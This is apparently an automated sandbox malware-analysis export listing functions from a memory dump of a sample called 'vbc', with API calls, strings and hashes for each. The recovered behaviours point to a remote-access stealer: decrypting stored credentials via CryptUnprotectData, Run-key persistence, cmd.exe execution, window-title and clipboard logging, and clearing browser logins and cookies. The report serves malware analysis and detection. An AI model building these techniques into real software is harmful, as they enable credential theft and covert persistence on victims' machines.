Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

CryptUnprotectData, xrefs: 00406A78
crypt32, xrefs: 00406A7D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
GetLastError.KERNEL32 ref: 0044C296
__dosmaperr.LIBCMT ref: 0044C29D

Strings

PkGNG, xrefs: 0044C255

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: PkGNG
API String ID: 2336955059-263838557
Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::failbit set, xrefs: 0040E815
ios_base::eofbit set, xrefs: 0040E822
ios_base::badbit set, xrefs: 0040E7EF

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
LocalFree.KERNEL32(?,?), ref: 0041CB2F

Strings

@J@, xrefs: 0041CAED
PkGNG, xrefs: 0041CAE1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: @J@$PkGNG
API String ID: 1427518018-1416487119
Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-1051519024
Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0

Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E016

Strings

bad locale name, xrefs: 0040E000

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 00413778, 00413788

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 3446828153-604454484
Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

/C , xrefs: 0041610E
cmd.exe, xrefs: 00416125
open, xrefs: 0041612A

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

GetCursorInfo, xrefs: 0040140A
User32.dll, xrefs: 0040140F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

GetLastInputInfo, xrefs: 004014AF
User32.dll, xrefs: 004014B4

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

[Cleared browsers logins and cookies.], xrefs: 0040C0E4
Cleared browsers logins and cookies., xrefs: 0040C0F5

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

], xrefs: 0040A57B
[ , xrefs: 0040A58F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004193F0
GetSystemMetrics.USER32(0000004D), ref: 004193F6
GetSystemMetrics.USER32(0000004E), ref: 004193FC
GetSystemMetrics.USER32(0000004F), ref: 00419402

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B

Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
GetLastError.KERNEL32 ref: 00449F2B

Strings

PkGNG, xrefs: 00449E3E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: PkGNG
API String ID: 203985260-263838557
Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[Text copied to clipboard], xrefs: 0040B7E6
[End of clipboard], xrefs: 0040B7D9

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

ACP, xrefs: 00451B55
OCP, xrefs: 00451B8B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

